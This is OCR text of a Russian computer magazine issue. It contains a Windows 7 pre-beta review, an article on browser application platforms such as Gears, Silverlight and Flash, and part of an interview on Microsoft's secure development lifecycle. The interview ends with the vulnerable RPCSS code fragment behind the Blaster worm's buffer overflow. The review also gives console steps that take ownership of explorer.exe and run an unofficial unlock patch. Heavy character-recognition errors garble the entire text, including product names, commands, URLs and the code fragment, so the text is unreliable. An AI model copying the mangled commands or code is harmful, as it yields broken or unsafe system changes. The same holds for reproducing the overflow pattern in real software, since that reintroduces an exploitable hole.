Сразу напрашивается вопрос: в чемтогда айс? Все чудеса начинаются 
после попытки запуска приложения. Программа стартует, а ее ярлыкдля 
быстрого запуска увеличивается и превращается в стандартную кнопку, 
которую мы привыкли видеть во всех предыдущих версиях ѴѴіпбоѵѵз. При 
закрытии программы происходитобратная трансформация. 

На этом возможности новой панельки не заканчиваются. Подобно 
Ѵіз1:а, можно навести курсор на иконку свернутого окна, чтобы 
увидеть уменьшенный вид окошка. Но зато несколько похожих окон 
сворачиваются в одну единственную иконку, а при наведении мыш- 
ки отображаются превьюшки всех окон сразу, среди которых удобно 
выбирается нужное. Правый клик по иконкам теперь вызывает 
совершенно новое меню, где отображаются как некоторый набор 
стандартный пунктов, так и пункты, которые добавляеттуда само 
приложение (обычно связанные с его функциональностью]. Еще 
один хинт: при наведении на одну иконку какого-то приложения в 
таксбаре все остальные окна становятся невидимыми. 

ѴѴіпбоѵѵз сама ресайзит окно до половины ширины экрана, если его 
поднести к левому или правому краю дисплея. Мега -удобно: тот же 
ѴѴогб на широкоформатном мониторе разворачивать на весь экран 
незачем. Идею с боковой панелью, которую МісгозоЙ усилено пиа- 
рил под именем 5 і сі е В а г, похоронили окончательно. Сами виджеты, 
впрочем, никуда не убрали — их по-прежнему можно расположить в 
любом месте приложения. 



В ОБНОВЛЕНИЮ ПОДЛЕЖИТ ВСЕ 

Мы уже привыкли, что в каждую версию операционных систем от 
МісгозоЙ входят стандартные приложения: М5 Раіпі:, Калькулятор, 
ѴѴогбРаб и т.д. Функционал не обновлялся еще со времен ѴѴіпбоѵѵз 95. 

К 20 10 году это недоразумение Мі егозой решила исправить и немного 
их проапгрейдить. В результате, М5 Раіпі: сменил ужасный и морально 
устаревший интерфейс на ультрамодный «гіЬЬоп»; получил обновлен- 
ный набор кистей и наконец-то научился сохранять изображения в 
бесплатный формат РЫВ. 

ѴѴогбРаб в функциональном плане изменений не претерпел, но, как и 
М5 Раіпі:, обновил «личико». Калькулятор, наконец-то, стало возможно 
использовать для вычисления сложных выражений, и он обзавелся 
конвертерами времени и величин. 

Все уже привыкли к стандартно му, тяжеловесному плееру ѴѴіпбоѵѵз 
Мебіа Ріауег. Отныне, вместо уродского и совершенно непригодного 
для рабооты монструозного интерфейса, пользователю пред- 
ставляется довольно симпатичное окошко, которое даже можно 
использовать :]. 

В АВТОМАТИЗАЦИЯ ПО-НАШЕМУ 

По- в иди мо му, МісгозоЙ всерьез задумались о преимуществе само- 
стоятельно создаваемых сценариев для автоматизации рутинных 
действий, которые так популярны в *піх-системах. А ведь дейст- 
вительно, порой возникаюттакие ситуации, когда задачу удобнее 
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решить с помощью нескольких строк кода. Возможностей простых 
ЬаПников не хватает, а СБсгірІ так многим и не полюбился. В 2006 
году на суд общественности М5 представила РоѵѵегЗЬеІІ — новый 
скриптовый язык, тесно взаимосвязанный с .ІЧЕТ Ргатеѵѵогк’ом. С 
ним очень легко «рулить» системой и многими продуктами от МБ. В 
ѴѴіпбоѵѵз 7 этот полезный и удобный инструмент наконец-то интегри- 
ровали поумолчанию. 



По умолчанию в сборке 6801 представлена обычная панель задач, 
которая ничем не отличается от аналогичной в Ѵізга. Все дело в 
том, что новая панель еще не стабильна и может привести к ошиб- 
кам. Поэтому разработчики ее залочили. Но все, что залочено, так- 
же легко может быть разлочено. Итак, для включения супербара 
надо проделать несколько нехитрых действий: 

1. Скачать из интернета (взять с нашего диска) небольшую про- 
граммку «Патч от Кабаеі». 

2. Скопировать ее в папку с ѴѴіпсіоѵѵз. 

3. Запустить консоль с правами администратора и выполнить 
следующие команды: 

> Сакеоѵт /1 %міпс!іг%\ехр1огег . ехе 

> сасіз %міпс!іг%\ехр1огег . ехе /Е /С <ИмяВашегоПользо- 
вателя> : Р 

> зкагк ипІоскРгокескесІРеаЦигез . ехе 

4. Перезапустить оболочку и лицезреть панельку будущего. 



г НОВЫЙ ЦЕНТР БЕЗОПАСНОСТИ 

В седьмой версии ѴѴіпбоѵѵз сильно обновился «Центр безопаснос- 
ти». Обновился настолько, что даже получил новое имя — ѴѴіпбоѵѵз 
БоІіЛіоп Сепіей С его помощью добраться до настроек любого прило- 
жения, связанного с безопасностью, проще пареной репы. Туттебе 
и настройки II АС, и настройки резервного копирования, и планиро- 
вание создания точек восстановления, и много чего еще. Вобщем, 
ссылки на все необходимые инструменты собраны в одном месте. 

Ѵі 5Іа преподнесла пользователям совершенно новое увлекательное 
и интересное занятие — отвечать на вопросы системы ІІзег АссоипІ 
Сопігоі, в теории предотвращающее запуск «опасных» и «подозри- 
тельных» приложений. На практике это выводило из себя до такой 
степени (опасные АРІ -функции, по мнению системы, вызывают 
очень и очень многие приложения), что пользователи стреми- 
лись тупо отключить систему. В ѴѴіпбоѵѵз 7, к счастью, НАС сильно 
переработали. Мало того, что для II АС стало возможным задавать 
уровень реакции, так еще и алгоритм определения подозрительных 
программ заметно улучшился. Во всяком случае, за время моего 
тестирования ІІАС появился всего один раз, и то — при запуске 
джойнера. 

г СШТК0ВѴ5ТЕР 

В качестве итога по привычке напрашиваются шаблонные слова о 
том, что перед нами всего лишь пре-бета, а потомутребоватьотнее 
чего-либо сверхординарного, по меньшей мере, глупо, но... Сборка 
ведет себя крайне стабильно — это раз. Система при всех включенных 
эффектах работает быстрее Ѵігіа — это два. Все программы, кроме 
Оаетоп Тооіз, отлично установились и без глюков функционируют — это 
три. Интерфейс крайне приятен и удобен — это четыре. Да и вообще, 
впечатления самые радужные и приятные, так что оставил я «семерку» 
в качестве основной системы на рабочей машине. Посмотрим, что из 
этого выйдет :) 

Р.3. 14-й день использования. Полет стабильный . ИНИ 
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НОВЫЕ ТЕХНОЛОГИИ ДЛЯ СОЗДАНИЯ НАСЫЩЕННЫХ ВЕБ-ПРИЛОЖЕНИИ 



Простые веб-страницы со скучными формами — это отстой и вчерашний 
день. В моде — веб-приложения с классными эффектами и мультимедиа, 
которые ни в чем не уступают обычным прогам. И дело даже не в АІАХ! 
Разве не круто написать админку для бота на самых прогрессивных техно- 
логиях? 



В ВЕБ-ПРИЛОЖЕНИЯ И КІА — ДВЕ (НЕБОЛЬШИЕ РАЗНИЦЫ 

Начиналось все с веб-приложений — доступных через браузер сайтов, 
реализующих некий сервис: скажем, обработку фотографий. Такое 
приложение можно запускать откуда угодно, не прибегая кустановке 
— но оно и лишено возможности получить доступ к ресурсам компьютера 
(крометех, что предоставил ему браузер]. К примеру, нельзя обработать 
фотки с жесткого диска — их придется через веб-интерфейс загружать 
на сервер (довольно обломно]. Однако технологии не стоятна месте, 
поэтому на рынке появились средства, расширяющие возможности 
браузера. Первыми были технологии АсбѵеХ от МісгозоЙ и ^ѵа-апплеты, 
но они оказались слишком сложны, ограничены в функциональности и, 
по сути, стреском провалились. А вот РІазЬ предложил то, отчего мир не 
смог отказаться и по сей день — векторную графику и анимацию, доступ 
каудио и видео функциям, развитые возможности программирования 
и продвинутый АРІ, который вкупе с готовыми компонентами призван 
упростить работу мощных приложений. Одна проблема: веб-сайтс воз- 
можностями программы — это все-таки не программа, а некий ресурс, 
загруженный в браузере, что сильно смущает многих пользователей. 



Разработчики решили, что если врага нельзя победить,— его можно 
обойти или хотя бы скрыть от пользователя. Таким образом, в браузерах 
появились возможности создавать веб-приложения (которые, на самом 
деле, никакие не приложения, а просто так выглядят] — в Воодіе СЬготе 
для любой страницы доступна команда «Создать ярлык приложения», 
которая действительно создает ярлык на Рабочем столе или в меню 
запуска программ. По клику открывается тоже самое окно браузера, 
только без всяких опознавательныхзнаковтипа панели инструментов, 
закладокили адресной строки. Точно также поступает и конкурирующий 
проект, Могіііа Ргізт, используя движок Могійа Рігебох’а (собственно, 
для использования нужно прикрутить к нему специальный плагин]. По 
сообщениям прессы, в Ба^агі также встроили подобные механизмы. Поя- 
вились и псевдо-приложения, которые просто запускаются в отдельном 
окне браузера, без дополнительных панелей и меню. Взаимодействие 
с системой пользователя в основном ограничивается добавлением 
ярлыков на рабочий стол и доступом к мультимедийным функциям через 
обычный РІазЬ-плагин. Я говорю об АбоЬе АІР, который мы уже рассмат- 
ривали в статье «Воздушная технология отАбоЬе» Ьс, #111]. 
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А что дальше? Дальше появилосьто, о чем мы собственно 
и хотим поговорить — ВІА-приложения. Аббревиатура РІА 
расшифровывается как РісЬ Іпіегпеі Арріісабоп и означает, 
что приложение оченьтесно связано с Сетью, и для своей 
работы требует постоянного (а часто еще и высокоскорост- 
ного] соединения. Кроме того, такие приложения, как 
правило, имеют насыщенный графикой и визуальными 
эффектами интерфейс — смотрится куда круче, чем убогие 
кнопочки и рамки, предлагаемые обычным НТМІ_. РІАчасто 
имеют доступ к ресурсам клиентского компьютера, основа- 



тельно выходя за рамки предоставленной браузером среды 
— но потому нуждаются в специальной среде исполнения. 
Такие приложения используют файловую систему, не огра- 
ничиваясь теми файлами, что указывает пользователь для 
загрузки, юзают мощности процессора, а зачастую и другие 
сторонние программы, установленные на компьютере, 
например, кодеки. Получается, что с одной стороны — это 
обычная веб-страница, с другой — она очень отличается 
отобычного сайта и выглядит и ведетсебя каксамое на- 
стоящее приложение! И знаешштехнологий для создания 



Немного алхимии и флеша — Ооот в браузере это реальность! 





На дискеты найдешь 
хорошую подборку 
для создания ПІА- 
приложений! 




> Ііпкз 

• Перечень возмож- 
ностей ЗіІѵегІідЫ: 2 
и отличия от пре- 
дыдущей версии: 
ЫТр://зі[ѵегІ.ідЫ:.пеі/ 
6е1:5і:агІ:есІ/оѵегѵіеѵѵ. 
азрх . 



• А также на сайтах 
русскоязычного 
сообщества: ѵѵѵѵѵѵ. 
зіІѵегІідЫегги . ѵѵѵѵѵѵ. 
зіІѵегІідЫ.ги . 

• Версию для ІІпіх- 
систем ты можешь 
взять отсюда : ѵѵѵѵѵѵ. 
до-топо.сот/ 
тоопІідЫ:. 

• Но ведь нужны еще 
и средства разработ- 
ки! Триал-версия М5 
Ехргеззіоп Зіисііо 2 
доступна для загруз- 
ки с сайта Місгозо^: 
ехргеззюп.птсгозоИ 
сот . 
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> ІП^О 

• Тііапіит [ ѵѵѵѵѵѵ. 
Іііапіитарр.сот ] 

— это открытая ком- 
понентная среда, 
которая позволяет 
при помощи все тех 
же исконно веб-тех- 
нологий НТМІ_/ 
СЗЗДіаѵаБсгірІ: 
строить десктоп ные 
и мобильные при- 
ложения с базами 
данных, окнами, 
меню и кросс-плат- 
форменными интер- 
фейсами. Проекту 
только пара недель 
отроду. 




> ѵѵагпіпд 

• Если Соодіе 
Сеагз или Уабоо 
ВгоѵѵзегРІиз нетре- 
буют новых навыков 
от разработчика, то 
при работе с РІазЬ, 
ЗіІѵегИдЫ: или ^ѵаРХ 
для написания 
приложений нужно 
изучать новый язык. 

• РІА иногда могут 
работать и без под- 
ключения кСети, но 
это скорее аварийный 
режим — на всякий 
случай. 




БіІѵегІідЫ: очень активно используется на родном корпоративном сайте Місго50^| 



ЫдИі Ур ЕМе ѴѴеЬ 




РІА-приложений уже предостаточно! Итак, начнем? 

Н 6006І_Е 6ЕАК5 — ШЕСТЕРЕНКИ ОТ 6006І.Е 

САЙТ: гіѳаг5.доодІе.сот 

ПОДДЕРЖКА БРАУЗЕРОВ: Рігеіох, Іпіегпеі Ехріогег и 
Баіагі, мобильные платформы АпсІгоісІ и ѴѴіпсіоѵѵз МоЬіІе 
ПРИМЕНЯЕТСЯ: 

• боодіе Росз — Іосз.доодіе.сот 

• боодіе Реасіег — геасіег.доодіе.сот 



• РететЬегТЬеМіІк- ѵтѵѵ.гететЬегІЬетіІк.сот 

• 2оИоѴѴгіІег - дИ сот 

• Блог-движок ѴѴоггіргезз 

• Встроен в браузер боодіе СЬготе 

Сеагз — это специальный плагин для браузеров, который 
расширяет доступный функционал для разработчиков 
А^Х-приложений. 0амой главной фичей проекта является 
поддержка оффлайн-режима работы. Другими словами, 
написанный с использованием 0оод1е 0еагз сервис за ра- 



Пример серьезных корпоративных приложений на Ріех 




Ѵоікнѵадеп УК-п»і) «гЬнШг 
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Разработчикам полезно будет знать, что большинство популяр- 
ных АІАХ-фреймвор ков и библиотек давно обзавелись встроен- 
ной поддержкой Сеагз (некоторые еще и ограждают тебя от зна- 
ния и копания, что же там внутри) . Все функции будут доступны, 
даже если Сеагз не установлен: библиотека попытается имитиро- 
вать функционал другим способом и лишь в крайнем случае уве- 
домит нерадивого пользователя, что хорошо бы установить этот 
замечательный плагин. Вот список библиотек, которые поддер- 
живают Соодіе Сеагз: Бор Тооікіі: и )( 2 иегу (проек^иегу-оШіпе, 
Ьнр://сосІе.;20о;Де. сот/р /ідиегѵ-оШіпе) : ЕхгЛь имеет начальную 
поддержку, а в форме выкладывались примеры — код не включен 
в официальный дистрибутив, но в примерах присутствует. 



нее подгружает себе все необходимое и позволяет продолжить работу с 
сайтом, даже если интернет временно пропал. Вот, для примера — когда 
я писал эту статью в Соодіе Иосз, внезапноупал мой ѴѴі Рі -роутер, и ин- 
тернета не было минут20. Тем временем я продолжал писать материал, а 
приложение исправно сохраняло данные в Сеагз. Сразу после того, как 
соединение было восстановлено, документ синхронизировался с сер- 
верами Соодіе. Одним из известнейших проектов, использующих Сеагз, 
не считая, конечно, Соодіе Оосз, является популярный движокдля 
блогов ѴѴогбргезз. Начиная с версии 2.6, он использует в админ-панели 
возможности беагз для оффлайн-работы с постами и комментариями. 
Поэтому для написания длинной статьи наличие постоянного подклю- 
чения теперь нетребуется, данные сохраняются даже при перезагрузке 
компьютера. Популярная социальная сеть МуСрасе также использует 
возможности плагина — если онустановлен.тозначительноудобнее 
загружать множество фотографий в аккаунт (благодаря тому, что в Сеагз 
встроен загрузчик изображений, более продвинутый, нежели реализо- 
ванный возможностями браузера]. 

Возникает вопрос: а как прикрутить поддержку Соодіе Сеагз в свой 
проект? Очень просто. Для разработчиков доступен специальный АРІ, с 
помощью которого ты можешь адаптировать свое приложение к исполь- 
зованию плагина. Среди «вкусных» фич можно отметить встроенную 
базу данных (да-да, полноценная 501-база данных, вместе с полно- 
текстовым поиском], АРІ для обработки изображений, работа с гео-ин- 
формацией, возможность вынесения ресурсоемких ^ѵа5сгірІ-задач 
в отдельные потоки. Последнее, кстати, крайне важно: ведь обычный 
скрипт на веб-странице сильно ограничен и браузер просто зависнет, 
если на него возложить что-то серьезное. Помимо этого Соодіе Сеагз 
позволяетскриптам на странице взаимодействоватьсфайловой систе- 
мой и, например, обращаться кфайлам. Правда, читать/писатьлюбые 



файлы на десктопе не получится (иначе всем посетителям твоей стра- 
нички было бы реально круто переименовать файл кегпа 132.СІ И, хе-хе), а 
вот вызватьдиалоговое окно для открытия —это запросто! Встроенная 
возможность создавать ярлыки для открытия указанного ІІРІ_ простым 
кликом — первая попытка дополнить веб-приложения взаимодействием 
с компьютером в обход браузера. 

При всех плюсахтакого подхода у него есть недостаток: для работы 
Соодіе беагзу пользователя должен бытьустановлен плагин. Справед- 
ливости ради стоитсказать, что деловтут на несколько минут — зайти 
на страницу деагз.доодіе.сот да нажать кнопкуустановки. В браузере 
Соодіе СЬготе он включен поумолчанию и есть все основания полагать, 
что вскоре он будет включен и в другие. Но все-таки, Соодіе Сеагз — это 
явно неАбоЬе ЕІазЬ, который установлен уже у большинства. 

УАНОО! ВК0ѴѴ5ЕК РШ5 — ПЛ ЮСАНУТЫЙ УАНОО БРАУЗЕР 

САЙТ : Ьгоѵѵ5егрІи5.ѵаІіоо.сот 

ПОДДЕРЖКА БРАУЗЕРОВ: Ріге*ох р ІЕ 6/7,5а*агі р СНготе, платформы 
Мае и РС 

ПРИМЕНЯЕТСЯ: некоторые проекты УаИоо!, Рііскг 

Ѵабоо! Вгоѵѵзег Ріиз — еще один плагин для браузера, который расширя- 
ет возможности обычных веб-приложений (написанных на ^ѵаЗсгірі]. 
По сравнению с Соодіе Сеагз, он появился недавно и еще не завоевал 
такой популярности, но вот что я тебе скажу: «Зря!». В отличие от Сеагз, 
ВгоѵѵзегРІиз больше ориентирован на расширения визуальных функций 
и обладает несколькими уникальными фишками. Для примера: поддер- 
живается такая обычная для приложений функция, какбгад-п-бгор, 
то есть ты просто можешь перетащить картинку на веб-страницу, и она 
будет автоматически загружена в открытое приложение. 

В плагин встроена невероятно мощная библиотека обработки графи- 
ки ІтадеМадіс стакими возможностями, что при грамотном подходе 
графический РЬоЬзбор Ехргезз от самой АбоЬе на ее фоне покажется 
детской игрушкой уровня М5 Ра і пЕ. Есть и более экзотические фичи, 
вроде взаимодействия с внешними приложениями на ПиЬу, функции 
доступа кустройствам, определяющим местоположение (аналогичное 
есть и в Сеагз, но актуально, по большей части, только на смартфонах 
и нетбуках] и даже сервис ТехІ-Іо-5реесЬ (правда, еслитвоя ОСтакне 
умеет, то ни какого те кета ты неуслышишь). Резюмирую: задумка очень 
и очень неплохая, правда, ей пока не хватает популярности. Причины, 
кстати, лежат на поверхности: плагин долгое время был закрытым, 
и только-только на днях объявили об открытии исходного кода. 

г МІСВ050РТ БИѴЕГШСНТ/МООЫибНТ - 
ЛУЧ СВЕТА В ТЕМНОМ ЦАРСТВЕ 

САЙТ: тісгозоН.сот/зіІѵегІідЬІ/ 

ПОДДЕРЖКА БРАУЗЕРОВ: Ріге*ох р I Е 6/7, 5а*агі р платформы Мас р РС и 



Попытка агонизирующего гиганта веба шагнуть за пределы браузера 
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Технологию ЭіІѵегІідЫ используют для разных сервисов, втом числе и молодые разработчики конкурса ІтадеСир| 





ЫпихАішх 

ПРИМЕНЯЕТСЯ: 

• на сайтах МісгозоН 

• сайт баскетбольной организации ИВА 

• сервис для подкастов и мультимедии іЗІгеатРІапеІ 

• сервис онлайн-телевидения зку.сот 

Распространенность ЕІазЬ-а не дает покоя многим, включая гиганта 
МісгозоЙ, а потому, доведя до ума (и неплохого, следует отметить, уровня] 
свою платформу .ЫЕТ Ргатеѵѵогк, микрософтовцы обратили внимание 
на рынок веб-приложений. И вот результат — М5 выпускаетуже вторую 
версию ЗіІѵегІідЫ:, а также, совместно с сообществом проекта Мопо, 
открытую реализацию для І_іпих/11піх — МоопИдЫ:, что вообщезнаковое 
событие. Это также плагин к браузеру, но уже другого порядка, нежели 
Оеагз или Вго\л/5егРІ_іі5. ЗіІѵегІідЫ — основа для исполнения приложе- 
ний, которые могут использовать большинство возможностей мощной 
платформы .ЫЕТ. Они имеют доступ к большому количеству мультиме- 
дийных функций (проигрывание РЮ- видео, работа с ЭРМ -защитой, 
обработка аудио- и видео-форматов ѴС-1 , ѴѴМѴ, ѴѴМА, МРЗ), широкие 
возможности разработки (ведь какосновной язык применяется С#, при 
этом есть возможность использовать любой из .ЫЕТ-языков], работа 
сХМЬ и данными в базах данных, многопоточность. Все дополняется 
интеграцией с ЭНТМЕ и ЭаѵаЗсгірІ:, а значит, можно нетолько писать 
приложения на этой платформе, но и прозрачно внедрять элементы 
5і Іѵегіід Ы; на веб-страницу, например, поддержку видео или средств 
рисования. Апри помощи АРІ для работы ссетью реально даже обойти 
ограничения обычного ХМ ЕНТТРРециезЕ являющегося основой всего 
А^Х-мира: допустим, реализовать возможность двустороннего обмена 
данными между клиентом и сервером по инициативе любой из сторон 
(то, что в АЗАХ-мире называется зегѵег-ризб или Сопле!: и требует особых 
извращений для реализации]. Здесьуже сложно понять, где кончает- 
ся браузер и начинается операционная система. ЗіІѵегІідЫ: — с одной 
стороны, это все же плагин к браузеру и все его возможности доступны на 
веб-страницах и через ЗаѵаЗсгірІ АРІ, с другой — он опирается на систем- 
ные библиотеки и возможности, предоставляя разработчику в браузере 
почти все возможности обычных программ для .ІЧЕТ. Такчто, еслиты не 
кривишься при одном упоминании компании МісгозоЙ и хочешь идти в 
ногу со временем, не стесняя себя в разработке крутых веб-программ, 
присмотрись к ЗіІѵегІідЫ: 2, это действительно круто! Да, забыл сказать, 
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№гіѵе СПепІ ГЬі:і:р://сосіе.^оо^1е.сот/р/паі:іѵес1іепі:) — новая 
технология от Соо^іе, представляющая собой открытую среду для 
запуска родного х86-кода прямо в браузере! Конечно, такой код 
должен отвечать требованиям безопасности и компилировать 
его надо специальными инструментами, но это уже серьезно! 

Так можно и Ілпих скомпилировать и заставить выполняться в 
браузере! Ну, или С^иаке запустить. Сделать это, кстати, несложно 
— всего в два шага: 

ИСначала установить Ыагіѵе СНеШ: ГЬнр://собе.^оо^1е.сот/р/ 
пагіѵесІіепіЭ : 

ИОткрыть в Соо^іе СЬготе или РігеіЪх’е страницу Ытр: //ргоіесщ, 
сосатап.пег/диаке/диаке.ЕдтЕ 



что вся эта кухня работает как на ѴѴіпбоѵѵз.таки на Мае, а с некоторыми 
ограничениями — даже на Еіпих. 

В АООВЕ РІ_А5Н/РІ_ЕХ И НЕМНОГО АЛХИМИИ 

САЙТ: И»р://ѵтѵ\А.асІоЬе.сот/ргосІисІ5 

ПОДДЕРЖКА БРАУЗЕРОВ: Ріге^ох, ІЕ 6/7, 5а*агі, платформы Мае, РС 

и І-іпих/ІІпіх 

ПРИМЕНЯЕТСЯ: 

• на сайтах АсІоЬе 

• интерактивные векторные карты ѵѵѵѵѵѵ.огЬізтар.сот 

• аукцион еВау 

• боодіе Апаіуйсз 

• Еще список Ріех-приложений — Нир://ѵѵікі.На5Н-гіррег.сот/ 

?1іНе=Примеры Ріех-приложений 

РІазЬ представлять особо не надо, думаю, все и такего знают. Нетак 
известна новая платформа, ориентированная как раз на веб и РІА-при- 
ложения — АбоЬе Еіех. Она также базируется на ЕІазЬ, однако дополне- 



► 030 



ХАКЕР 01 /121/ 09 






^ рс_гопе 



ЩИ* 




і-ні* 


ВгоѵеѳгРГдеГ 




~ | _ ЧН1ІЕААГХ. | 



ЕРіпыаі- БіѵіЙ*рі;іі 





Е!фІа г е 



В г сак Оиі оГ Ѵоиг Вгошзег 



Вго'лчеіРкі*™ І5 а іесЛгтеІеду ГогѵуЛ Ьгѵѵззгі Нм* аИои-ч йеѵеіереге то 
СГФВІе гиЬ июЬ эрріісяіірлз ѵлІЬ СРраЫНчя, 



оачізспрі арц Ьх 

Оо$к№р Н отІЛаго , 
ітаде ЕіШіпд, стЦ іт 
»иіП Оч 5чм;? ЁхрЮТг 



Одного плагина мало — для работы надо еще установить компоненты и разрешить браузеру использовать их возможности. Без этого никак, безопас- 





на днях вышла интересная технология от Зип, для поклон- 
ников Іаѵа — ТаѵаРХ. Она предназначена для разработки и 
запуска в браузере КІА-приложений, написанных при помощи 
специального языка РхЗсгірі:. Платформа запускается поверх 
установленной ЖЕ и обеспечивает продвинутые средства вос- 
произведения мультимедии (правда, им далеко до ЗіІѵегІі^Ьі: 
или РІазЬ), рисование, взаимодействие с веб-сервисами, а 
главное — работу на мобильных устройствах, что флешу дает- 
ся ой как сложно. Большим плюсом будет то, что под Жѵа есть 
множество средств разработки, которые пригодятся и при 
разработке ЖѵаРХ. Конечно, это только первая версия, и Зип 
еще надо реабилитироваться за провальные ]аѵа-апплеты... 
Подробности: Ьшр : / /ѵѵѵѵѵѵ.і аѵабх. сот /аЬоиг /оѵегѵіеѵѵ 

на серверными компонентами, позволяющими обмениваться данными 
с приложением, а также языком описания интерфейсов МХМІ_, который 
автоматизирует некогда рутинную работу по созданию разных кнопочек, 
меню и других 0111-элементов. Болеетого, РІазЬ и АбоЬе не намерены 
отставать от конкурентов. Недавно анонсированная 10-я версия флеша 

— еще мощнее и интересней в плане основы для веб-приложений. Ана- 
логично другим технологиям, а в особенности ЗіІѵегІідЫ, она предлагает 
развитые средства поддержки векторной графики, мультимедийных 
эффектов и работы с видео-аудио, вплоть до НБ, мощные операции по 
обработке графики и мультимедии через компонент АбоЬе Ріхеі Віепбег! 
Но и это не все. Не открою секрет, если скажу, что во РІазЬ встроена аппа- 
ратная акселерация. Понятно, что игры вроде РагСгу или Сгузіз на флеше 
не сделаешь, а вотуровня Оиаке/Боот — вполне! Проект АбоЬе Аісбету 

— это целая алхимия для веб-приложений. Ведь теперь прямо с флеш - 
плеера можно обращаться и полноценно задействовать в работе сто- 
ронние компоненты, написанные на языках, привычныхдля настольной 
разработки, например С++. Специальный компилятор берет кодлюбой 
библиотеки на С++ и превращает в код для виртуальной машины низкого 



уровня (еще не нативный коддля процессора, ноуже близко кнему и 
кроссплатформенно, ведь исполняется он поверх флеша — хоть намного 
ближе к процессору, чем к браузеру). Берешь С++ библиотеку, например, 
ЗБ-движок, компилируешьее, а потом во флеше просто загружаешь и 
работаешь, получаятаким образом без всяких специальныхдвижков 
полное ЗБ со всеми поддержками БігеЫХ или ОрепОЫ Если раньше гуру 
писали трехмерные движки на самом флеше, изощряясь и удивляя даже 
самих адобовцев (не веришь, посмотри — ЬирУ/аЙетабуарІаЙогт. 
сот/ги і.то теперь такой же и даже вышеуровень можно получить, просто 
скомпилировав хороший движок. Кстати — в Боот нехочешьпоиграть? 
Тебе сюда — тѵѵѵѵѵ.пеѵѵд гоипбз.сот/рог1:а[/ѵіеѵѵ/470460 . 

Н А ЧТО В ОСАДКЕ? 

А результату нас простой. Для расширения функциональности 
веб-сайтов и всяких сетевых сервисов придумали и даже воплоти- 
ли в железе (ой, в коде) сначала плагины для браузеров. Расширяя 
Баѵа5сгі рі:, они добавили возможности, ранее недоступные или 
ограниченные, для обычных веб-страниц. Поигравшись с новинками, 
все сказали «вау, круто!». После чего опять продолжились разговоры 
об ограничениях, сетование на недоступность возможностей и про- 
гресс в настольных платформах, например ,І\ІЕТ от МісгозоЙ. И здесь 
появилась вторая волна средств — плагины-платформы ЗіІѵегІідЫ и 
АбоЬе ЕІазЬ/ЕІех/АІсбету, которые принесли в браузер большинство 
фичей настольного программирования, включая языки (С# и .ІЧЕТ 
Егатеѵѵогк в ЗіІѵегІідЫ: 2, С++ в Аісбету) и расширенную поддержку 
современной мультимедии. Правда, теперь писать на привычном 
ЗаѵаЗсгіріуже не получится, — надо изучать серьезные языки и 
соответствующие средства разработки. Блокнотом и подсветкой 
синтаксиса не обойдешься, применяй большие ІБЕ (зря мы, что ли, 
описывали тебе десктоп веб-кодера в прошлом номере?). Все плавно 
перекочевало в плагины и теперь, если ты открываешь современное 
РІА-приложение на этих платформах, то смирись, что страничка — это 
только обертка, а браузер, скорее, помеха, чем помощник в работе. 

Тут уже недалеко до кощунственной мысли: а зачем веб-приложению, 
собственно, браузер? Может, ну его, нафиг? : Ьг 
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После окончания московского 
Государственного Университета, 
начиная с 1 999 года, Иван работает 
в «Майкрософт» в различных проектах по 
технологиям обеспечения безопасности 
ПО. Иван работал в группе по разработке 
методологии проектирования безопасного 
кода, группе по обеспечению безопасности 
ѴѴіпсіоѵѵб, а сейчас возглавляет группу по 
разработке внутренних инструментов для 
реализации подходов 
по проектированию безопасного кода. 



И ЛИ БЕЗО ПАСНОСТЬ 
ПО МісгозоК 



КН 



«тШ 




БЕСЕДУЕМ С ИВАНОМ МЕДВЕДЕВЫМ О 5ЕСІІВІТѴ ОЕѴЕЮРМЕМТ ЫРЕСѴСІ.Е 






[ 



БЕСЕДУ ВЕДЕТ СТЕПА ИЛ 1 

2003 год, 1.500.000 инфицированных компьютеров по всему миру, 

3.370.000 звонков в службу поддержки, множество негатива в прессе — цена 
ошибки в двух строчках кода службы КРСЗЗ. Что изменилось в подходе к 
разработке безопасного кода со времен «Бластера», как самим писать на- 
дежные приложения — это и многое другое рассказал нам Иван Медведев, 
Зепіог Оеѵеіортепі: Беасі компании МісгозоО:. 



□ ели бы пять лет назад МісгозоГ поехала с презентацией на 
ВІаскНаГ большинство людей просто рассмеялось бы», 

— признает наш гость. Сейчас же — это обычное явление. В 
Місгозоіі: огромное число хороших специалистов по безо- 
пасности, настоящих профи, но за ста вить такую огромную машину рабо- 
тать безукоризненно очень сложно. Нельзя просто придти и сказать: «С 
завтрашнего дня все 50000 сотрудников, которые работают в МісгозоІТ, 
станут специалистами по безопасности». Это нереально! Поэтому 
компания всерьез взялась за разработку некоторого набора практик, 
проверенных подходов и инструментальных средств, которые позволяют 
разрабатывать безопасный код. Именно благодаря этому появилосьто, о 
чем мы сегодня и поговорим, — 50І_ или Эесигііу Оеѵеіортепі: ІЛесусІе. 



Н СЕМЬ СТАДИЙ 5РІ_ 

Иван Медведев руководит отделом по разработке внутренних програм- 
мных средств для проверки программного обеспечения. Он специально 
прилетел в Москву, чтобы представить свой доклад по 506 и моделиро- 



ваниюугроз на конференции 5ЕС(П]2008, а мы неупустили возможности 
пообщаться с ним лично. И вотчтоон нам рассказал. 

506 на русский проще перевести как«жизненный цикл безопасного 
программного обеспечения». По сути, это документация, которая описы- 
ваеттак называемые Ьезі ргасбсез — рекомендуемые практики того, как 
разрабатывать безопасные приложения, и какие инструменты необходимо 
использовать для проверки безопасности. Говоря просто: есть ряд правил, 
которым нужно следовать, и набор инструментов, которые нужно использо- 
вать. 506 предполагает, что разработка обязательно должна пройти семь 
стадий: обучение, подготовка требований, дизайн, разработка, проверка, 
выпуск, поддержка. Так вот, на каждой стадии документация 50І_ описывает 
какие-то рекомендуемые практики, — каким образом разрабатываемый код 
получался безопасным. Например, на стадии дизайна рекомендуется делать 
моделированиеугроз и анализ поверхности атаки (подробности — дальше]. 
На стадии разработки проверяется, не используются ли в проекте запрещен- 
ные функции, а также проводится статический анализ кода. Стадия проверки 
включает в себя та кие вещи, как пентест.динамическоетестирование кода, 
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Та самая ошибка 

Ошибка, о которой идет речь в статье и которую, в итоге, эксплу- 
атировал известный червь Віазгег, была в следующем фрагменте 
кода: 

ШСНАК ѵ^згМасйіпеКате [N+1 ] { 

ѴГСНАК. ѵ^згМасЬіпеКате [Ы + 1] ; 



} 



ЬРЗТК рмзгЗегѵегЫате = мзгМасЬіпеЫате; 
ѵЛііІе ( *рѵ73 2Ра1:Ь. != Ь ' \\ ' ) 

*рѵ^328егѵегЫате++ = *рѵ^3 2РаЫі++ ; 



В этом коде атакующий использовал аргумент рѵѵзгРагіі, чтобы 
осуществить переполнение буфера ѵ\гаШасЫпе№те. 



